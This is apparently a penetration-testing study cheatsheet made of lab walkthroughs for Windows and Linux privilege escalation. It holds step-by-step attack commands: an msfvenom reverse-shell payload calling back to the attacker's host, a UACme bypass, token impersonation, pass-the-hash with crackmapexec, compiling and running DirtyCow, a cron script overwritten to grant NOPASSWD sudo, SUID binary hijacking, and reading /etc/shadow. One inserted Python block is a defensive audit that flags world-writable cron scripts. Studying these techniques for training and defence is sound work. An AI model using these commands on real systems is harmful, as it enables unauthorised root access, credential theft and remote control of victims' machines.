sysinfo (write it down) -> pgrep explorer -> migrate PID_of_explorer -> getuid (we are a user in the admin group) -> getprivs (has few privileges) -> shell -> net user -> net localgroup administrators -> net user admin password123 (access denied = UAC); we go to the UACme repo on github and download the appropriate version -> msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipkali LPORT=availableport -f exe > backdoor.exe; we open another metasploit and use multi/handler (configure it the same as the msfvenom payload) -> run
We return to the admin meterpreter session -> go to Temp and if it is not in the root folder, create it with mkdir -> upload backdoor.exe -> upload /root/Desktop/tools/UACME/Akagi64.exe (the UACme build chosen from the repo according to the OS) -> shell -> dir -> .\Akagi64.exe 23 C:\Temp\backdoor.exe (and in multi/handler we should already have a privileged session)

Access token impersonation:

These privileges are required for the attack:
SeAssignPrimaryToken: allows the user to impersonate tokens
SeCreateToken: allows the user to create a token with administrator privileges
SeImpersonatePrivilege: allows the user to create a process under the security context of another user, usually one with administrator privileges.

Meterpreter incognito module: allows impersonating tokens after successful exploitation; it lists the available tokens so they can be impersonated.
Exploitation of access token impersonation:
in a Meterpreter -> sysinfo (write it down) -> pgrep explorer -> migrate PID_of_explorer -> getuid -> getprivs (has few, but has SeImpersonatePrivilege) -> load incognito (if meterpreter dies, run the exploit again) -> list_tokens -u (we have delegation tokens; we are interested in the Administrator account) -> copy its token to the clipboard -> impersonate_token "ATTACKDEFENSE\Administrator" -> pgrep explorer -> migrate PID_of_explorer -> getprivs (we now have all of them)

If there were no tokens, do the potato attack to create a token and impersonate_token "NT AUTHORITY\SYSTEM"

The unattended Windows setup utility saves user information and system config info in C:\Windows\Panther\Unattend.xml and Autounattend.xml (base64-encoded passwords)

Pass the hash authentication: with the psexec module in metasploit or with crackmapexec
metasploit: search psexec -> use the proper meterpreter payload -> configure it as needed -> set smbpass to the plain-text password or the hash LM:NTLM -> set target Command / Native upload (the right one)
crackmapexec: crackmapexec smb IPobj -u Administrator -H "NTLM hash" (Pwned! = good) -x "command" to execute commands

Linux:
Kernel exploit:
We need to know the kernel version
Metasploit Meterpreter + Linux Exploit Suggester: sysinfo (OS + version + kernel); getuid (we are an unprivileged user [even a service account like www-data works])
cd /tmp -> upload ~/Desktop/Linux-Enum/les.sh -> chmod +x les.sh -> ./les.sh (lists vulns and exploits, also reports the architecture and kernel version) -> we download DirtyCow from exploit-db.com (it is written in C) -> mv 40839.c dirty.c (rename) -> gcc -pthread dirty.c -o dirty -lcrypt (we follow the compilation instructions in the exploit's header) -> we go back to meterpreter and upload ~/Downloads/dirty (the compiled executable) -> /bin/bash -i -> chmod +x dirty -> ./dirty (enter a password if you want) -> it fails because it was not compiled on the target machine -> back to meterpreter -> shell -> /bin/bash -i -> gcc -pthread dirty.c -o dirty -lcrypt -> chmod +x dirty -> ./dirty password123 (creates a firefart user who is root, backing up /etc/passwd before creating it; now we have a firefart user with the password password123) -> su firefart (it does not work here, but it does over SSH) -> ssh firefart@IPobj (answer the prompts and log in) -> as root we can cat /etc/shadow to see the hashes of the user passwords.

Misconfigured cron jobs:

We have access to a target Linux as an unprivileged user

crontab -l (no crontab for student)
ls -al: in home there is a file owned by root (file = message) that only has read and write permissions for root
cd / -> grep -rnw /usr -e "home/student/message" (searches recursively under /usr, where shell scripts are typically located, for files where home/student/message appears) -> answer: /usr/local/share/copy.sh:2:cp /home/student/message /tmp/message
We find a shell script (/usr/local/share/copy.sh) and the appearance of "home/student/message" tells us that the file is being copied to /tmp/message
list the contents of /tmp: ls -al /tmp
we have the message file with read permission -> we cat it
ls -al /usr/local/share/copy.sh (the file belongs to root but has all permissions for everyone)
we cat it and see that it does the copy shown above every minute (the script runs every minute). In this lab we don't have nano or vim, so:
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
sudo -l (user student may run the following commands: (root) NOPASSWD: /etc/init.d/cron [before modifying the script]; (root) NOPASSWD: ALL [after modifying the script])
sudo su (we are now root without being asked for authentication)
crontab -l (to see how often the cron job is executed)
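The root cause in this lab is a root cron job whose script is world-writable. The added example below (not part of the cheatsheet) is the audit a defender runs to catch that before an attacker does: it parses /etc/crontab-style lines (minute hour dom month dow user command), takes the first token of each command as the script path, and reports the ones any local user can modify. It builds its own sample crontab and scripts in a temporary directory so it runs anywhere; on a real host you would feed it /etc/crontab, /etc/cron.d/* and the output of crontab -l for root.

```python
import os
import stat
import tempfile


def cron_script_paths(crontab_text):
    """Yield (user, path) for each absolute command path in /etc/crontab-format lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        # skip blanks, comments and VAR=value assignments such as SHELL=/bin/sh
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:          # @reboot-style or malformed lines are not handled here
            continue
        user, command = parts[5], parts[6]
        path = command.split()[0]   # the script or binary cron will execute
        if path.startswith("/"):
            yield user, path


def world_writable(path):
    """True if the file exists and its mode grants write to 'other'."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def find_writable_cron_targets(crontab_text):
    """Return [(user, path)] for cron commands whose script anyone can modify.
    A hit with user 'root' is the exact misconfiguration exploited above."""
    return [(u, p) for u, p in cron_script_paths(crontab_text) if world_writable(p)]


def build_sample_env():
    """Constructed sample: a temp dir with one world-writable script (copy.sh, like the
    lab) and one correctly protected script, plus a crontab that runs both as root.
    Returns (crontab_text, tempdir)."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "copy.sh")
    good = os.path.join(d, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("#!/bin/bash\ncp /home/student/message /tmp/message\n")
    os.chmod(bad, 0o777)   # rwxrwxrwx: the lab's misconfiguration
    os.chmod(good, 0o755)  # rwxr-xr-x: only the owner can change it
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"* * * * * root {bad}\n"
        f"0 2 * * * root {good} --full\n"
    )
    return crontab, d


if __name__ == "__main__":
    crontab_text, _ = build_sample_env()
    for user, path in find_writable_cron_targets(crontab_text):
        print(f"WARNING: cron job for {user} runs world-writable script {path}")
```

The check only looks at the script itself; a complete audit also walks each parent directory, because a writable directory lets a user replace the script even when the file's own mode is tight.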

Exploiting SUID binaries:

we have access as an unprivileged user
in /home/student -> ls -al (we have 2 binaries, greeting and welcome, both owned by root); greeting only has r-x permissions for root, but welcome has rwsr-xr-x permissions, where the s is the SUID bit, so we are allowed to run it normally
file welcome: a standard ELF binary with a shared object (after "interpreter" = shared object). If the shared object does not exist, a malicious one, or one with code that elevates privileges, can be created. In this case the shared object it uses does exist (none is missing)
strings welcome: we see the shared object, we see setuid (that is, it is a SUID binary) and we also see that it invokes the "greetings" binary, which is external but gets executed
rm greetings -> cp /bin/bash greetings: now bash runs as the new greetings file, so when I execute welcome I am root
now we can cat /etc/shadow and whatever we want

Exploiting a vulnerable program:

we get a meterpreter:
shell -> ps aux (root runs a /bin/check-down binary through bash, /bin/bash; first the bash appears and then the binary)
cat /bin/checkdown (it is a bash script which, in a while loop, executes the chkrootkit program every 60 seconds)
chkrootkit is a program that scans the PC to prevent the execution of a rootkit; in this particular case it is vulnerable to a privilege escalation (this vuln only affects versions prior to 0.5.0). To see the program version: chkrootkit --help -> chkrootkit -V
Control+C to close the shell channel
background the meterpreter session
search chkrootkit -> use -> show options -> set the chkrootkit session, path, lhost and lport -> exploit (if it doesn't work, use the absolute path to chkrootkit) and we are root
Web apps vulnerability scan:
with wmap:
In meterpreter:
load wmap -> wmap_<TAB> (to see commands)
wmap_sites -h (to specify a web page to scan)
wmap_sites -a IPobj (add that page/IP to wmap)
wmap_targets -h (in case we have more targets/URLs, enter the URL of the page)
wmap_targets -t http://IPobj/path (to set the targets)
wmap_run -h (uses auxiliaries that search for vulns)
wmap_run -t (lists the auxiliaries we can use and tries some basics like http-version, etc.)

with NIKTO:
NIKTO WEB APP VULN SCAN TUTORIAL

with WPscan (wordpress scan):
WP SCAN USER DOCUMENTATION

Cross compiling exploits / cross compiled exploits:

pre-compiled exploits can be downloaded and used directly

We select the exploits to compile or cross compile: exploits written in C should have information on how to compile them with mingw if they are configured correctly; if there is no information, compile with the defaults

Windows:
x64:
i686-w64-mingw32-gcc exploit.c -o exploit (builds a portable executable)
If it gives an error, after -gcc there are -arguments; press tab to see them
x32:
i686-w64-mingw32-gcc exploit.c -o exploit -lws2_32
Linux:
use the gcc tool directly

Reverse shells cheatsheet:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

https://www.revshells.com/